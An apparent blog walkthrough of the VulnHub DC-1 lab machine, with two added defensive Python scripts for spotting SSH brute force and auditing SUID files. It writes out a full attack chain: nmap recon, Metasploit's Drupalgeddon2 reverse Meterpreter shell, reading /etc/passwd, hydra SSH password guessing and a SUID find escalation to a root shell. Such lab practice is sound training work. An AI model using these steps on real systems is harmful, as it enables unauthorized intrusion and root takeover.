Description

DC-1: 1 is a purposely built vulnerable lab for gaining penetration-testing experience. The machine was designed as a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and on your ability to learn. You can download the machine from this link: https://www.vulnhub.com/entry/dc-1-1,292/

Required Knowledge

  • Familiarity with the Linux command line
  • Basic pen-testing tools
  • Built-in tools of Kali Linux

DC-1: 1 vulnhub walkthrough

After setting up DC-1: 1, we start by enumerating the machine, so let’s first find out its IP address.

[email protected]:~# arp-scan -l

The arp-scan -l command lists the IP addresses of the systems connected to the same network segment. It also shows their MAC addresses.

[email protected]:~# nmap -sV -p- 192.168.154.136

nmap is used for network auditing. Here we pass two options to nmap, followed by the target IP address.

  1. -sV probes the open ports for service and version information.
  2. -p- scans every port (1 to 65535) instead of nmap’s default port list.

nmap completed the scan and reported four open ports, as shown in the figure above.

First, open the website running on port 80, since web applications are a common source of vulnerabilities. The site turns out to be running Drupal.

Since the site runs Drupal, I opened Metasploit to check for known Drupal vulnerabilities.

[email protected]:~# msfconsole 

msf5 > search drupal

Matching Modules
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
msf5 >

Several Drupal modules are available, so let’s try the most recent one.

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.154.136
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.154.132:4444
[*] Drupal 7 targeted at http://192.168.154.136/
[-] Could not determine Drupal patch level
[*] Sending stage (38247 bytes) to 192.168.154.136
[*] Meterpreter session 1 opened (192.168.154.132:4444 -> 192.168.154.136:35416) at 2019-03-09 16:52:47 -0500

meterpreter >

We now have a Meterpreter session; let’s check what we have. If this module is not available in your Metasploit, update your operating system and try again.

meterpreter > shell
Process 5799 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

In the commands above we checked the user name and ID, then the present working directory. Then we read /etc/passwd, which holds the user account information, and found a local user (flag4) on the target, so we can try to log in as that user.

Here I am using hydra to brute-force the SSH password for the user flag4 on the target.

[email protected]:~# hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.154.136 -I
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-03-09 17:08:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored …) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3559 login tries (l:1/p:3559), ~223 tries per task
[DATA] attacking ssh://192.168.154.136:22/
[22][ssh] host: 192.168.154.136 login: flag4 password: orange
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-03-09 17:09:09
[email protected]:~#

hydra is a very powerful brute-forcing tool; there are many other tools that can be used for the same purpose.
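From the defender’s side, the burst of failed logins that hydra produces is easy to spot in sshd’s log. The following Python script is an added example, not part of the original walkthrough: it parses constructed auth.log-style lines (the host name DC-1, the user flag4 and the two addresses are taken from the session above; the timestamps, PIDs and client ports are made up) and flags any source address that fails password authentication several times within a short window, noting whether a password login from that address succeeded afterwards.

```python
"""Flag SSH password-guessing bursts in sshd log lines.

Added example (not from the original walkthrough). The sample lines below are
constructed to look like Debian's /var/log/auth.log during a hydra run.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: four failures in two seconds from one address,
# followed by a successful password login from the same address, then an
# unrelated key-based login from another host.
SAMPLE_AUTH_LOG = """\
Mar  9 17:08:41 DC-1 sshd[2101]: Failed password for flag4 from 192.168.154.132 port 50214 ssh2
Mar  9 17:08:41 DC-1 sshd[2102]: Failed password for flag4 from 192.168.154.132 port 50215 ssh2
Mar  9 17:08:42 DC-1 sshd[2103]: Failed password for flag4 from 192.168.154.132 port 50216 ssh2
Mar  9 17:08:42 DC-1 sshd[2104]: Failed password for invalid user admin from 192.168.154.132 port 50217 ssh2
Mar  9 17:09:09 DC-1 sshd[2105]: Accepted password for flag4 from 192.168.154.132 port 50230 ssh2
Mar  9 17:30:02 DC-1 sshd[2200]: Accepted publickey for flag4 from 192.168.154.10 port 40100 ssh2
"""

# Matches "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n>".
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_auth_log(text):
    """Return one dict per sshd authentication line; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        # syslog timestamps carry no year; only differences matter here, so the
        # year strptime defaults to (1900) is good enough.
        e["ts"] = datetime.strptime(e["ts"], "%b %d %H:%M:%S")
        events.append(e)
    return events


def detect_bruteforce(events, threshold=3, window_seconds=60):
    """Return {ip: summary} for every source address with at least `threshold`
    failed attempts inside some span of `window_seconds`."""
    failures = defaultdict(list)
    password_ok = defaultdict(list)
    for e in events:
        if e["result"] == "Failed":
            failures[e["ip"]].append(e)
        elif e["method"] == "password":
            password_ok[e["ip"]].append(e)

    alerts = {}
    for ip, fails in failures.items():
        fails.sort(key=lambda e: e["ts"])
        # Slide a window of `threshold` consecutive failures over the list.
        for i in range(len(fails) - threshold + 1):
            first, last = fails[i]["ts"], fails[i + threshold - 1]["ts"]
            if (last - first).total_seconds() <= window_seconds:
                alerts[ip] = {
                    "failed_attempts": len(fails),
                    "users": sorted({e["user"] for e in fails}),
                    # A password login after the burst means a guess worked.
                    "password_login_after_burst": any(
                        s["ts"] >= last for s in password_ok[ip]
                    ),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

On the sample data the script reports 192.168.154.132 with four failures against two user names and a password login after the burst, while the key-based login from 192.168.154.10 raises nothing. Paired with key-only authentication (PasswordAuthentication no in sshd_config) and a rate limiter such as fail2ban, a wordlist attack like the one above becomes both noisy and unsuccessful.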

[email protected]:~# ssh flag4@192.168.154.136
flag4@192.168.154.136's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 9 10:13:45 2019 from 192.168.154.132
flag4@DC-1:~$ id
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)

Privilege Escalation of DC-1: 1 vulnhub walkthrough

flag4@DC-1:~$ find / -type f -perm -u=s 2>/dev/null

In the output of the find command above (shown in the figure) we can see that /usr/bin/find has the SUID bit set.
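The same find command that reveals the SUID binary is what a defender runs to audit a host. Below is an added Python example, not part of the original post, that makes the audit repeatable: it collects setuid regular files (skipping unreadable paths the way 2>/dev/null does), compares them with a baseline of expected setuid programs, and reports anything extra. The baseline set and the sample listing are constructed for the example; a real baseline should come from a freshly installed reference system.

```python
"""Audit setuid binaries against an expected baseline.

Added example (not from the original walkthrough). A setuid bit on a program
that can run other commands, such as find with -exec, gives every local user
the file owner's privileges, so an unexpected setuid file is a finding.
"""
import os
import stat

# Constructed baseline: setuid programs an administrator expects on a minimal
# Debian host. Build a real one from a clean reference install, not from memory.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/passwd", "/usr/bin/sudo",
}

# Constructed listing standing in for a live scan: (path, st_mode) pairs.
# 0o104755 is a regular file with the setuid bit set; 0o100755 has no setuid.
SAMPLE_LISTING = [
    ("/bin/su", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/find", 0o104755),   # the file the walkthrough found
    ("/bin/ls", 0o100755),
]


def is_setuid(mode):
    """True for a regular file whose setuid bit is set (what -perm -u=s matches)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_setuid_files(root):
    """Walk root and yield (path, mode) for every setuid regular file."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode   # lstat: do not follow symlinks
            except OSError:
                continue                        # unreadable or vanished; skip it
            if is_setuid(mode):
                yield path, mode


def audit_setuid(listing, baseline=EXPECTED_SUID):
    """Split setuid files into expected and unexpected, and list baseline
    entries that are absent (a removed or renamed system binary)."""
    present = sorted(path for path, mode in listing if is_setuid(mode))
    return {
        "expected": [p for p in present if p in baseline],
        "unexpected": [p for p in present if p not in baseline],
        "missing": sorted(baseline - set(present)),
    }


def remediation(path):
    """Command that clears the setuid bit on an unexpected file (review first)."""
    return f"chmod u-s {path}"


if __name__ == "__main__":
    report = audit_setuid(SAMPLE_LISTING)
    for path in report["unexpected"]:
        print(f"UNEXPECTED setuid: {path} -> {remediation(path)}")
    # Live scan of the real filesystem (no root needed; unreadable dirs are skipped):
    # report = audit_setuid(find_setuid_files("/"))
```

On the constructed listing the audit flags /usr/bin/find as unexpected and suggests chmod u-s /usr/bin/find; on a real host, run it from a cron job or a configuration-management check so that a newly set SUID bit is noticed before someone else finds it.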

flag4@DC-1:~$ touch ankit
flag4@DC-1:~$ find / -type f -name ankit -exec "whoami" \;
root
flag4@DC-1:~$

The first command creates a file; the second searches for that file and runs “whoami” on it. -exec makes find execute another command for each matching file, and because find is SUID root, that command runs as root.

flag4@DC-1:~$ find / -type f -name ankit -exec "/bin/sh" \;

As the figure shows, we now have root access. I hope you like this post; feel free to ask any questions. Stay connected with Cybrary India because knowledge matters, and we are doing our best to provide solutions to vulnhub walkthroughs. I hope you learned a lot from the DC-1: 1 vulnhub walkthrough.
